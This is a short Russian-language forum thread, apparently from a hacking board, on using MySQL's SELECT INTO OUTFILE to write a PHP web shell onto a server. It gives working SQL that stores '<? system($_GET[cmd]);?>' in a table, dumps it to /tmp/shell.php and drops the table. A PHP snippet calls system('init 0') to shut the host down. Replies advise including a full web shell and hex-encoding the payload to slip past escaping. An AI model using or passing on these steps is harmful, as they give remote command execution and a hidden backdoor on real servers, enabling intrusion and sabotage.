Есть
Создаем допустим таблицу, в какое нить поле помещаем что-нить типа:
<?
system ('init 0'); // или любой производный код.
?>

SELECT поле INTO OUTFILE "/www/index2.php"
FROM таблица;

После выполнения запроса формируется файл в указанной дирректории с данными из таблицы

правда там нада разобраться с экранированием символов, типа
SELECT поле INTO OUTFILE "/www/index2.php"
FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY "\n"
FROM таблица;
// ну эт просто пример...

create table `lamak` (`phpcod` text not null);
insert into `lamak` (`phpcod`) values ('<? system($_GET[cmd]);?>');
select phpcod from `lamak` into outfile '/tmp/shell.php';
drop table `lamak`;

Только мой тебе совет, гет не используй, лучше поставь инклуд на нормальный веб-шелл.

Хм, зачем создавать таблицу, запихивать в неё код шелла, затем выводить это все в файл, получая шелл, а затем удалять таблицу?

На много проще будет сразу записать данные в файл:

Только код шелла советую предварительно запихивать в хексы.

А вообще поиск юзать нужно перед созданием темы - обсуждалось и не раз.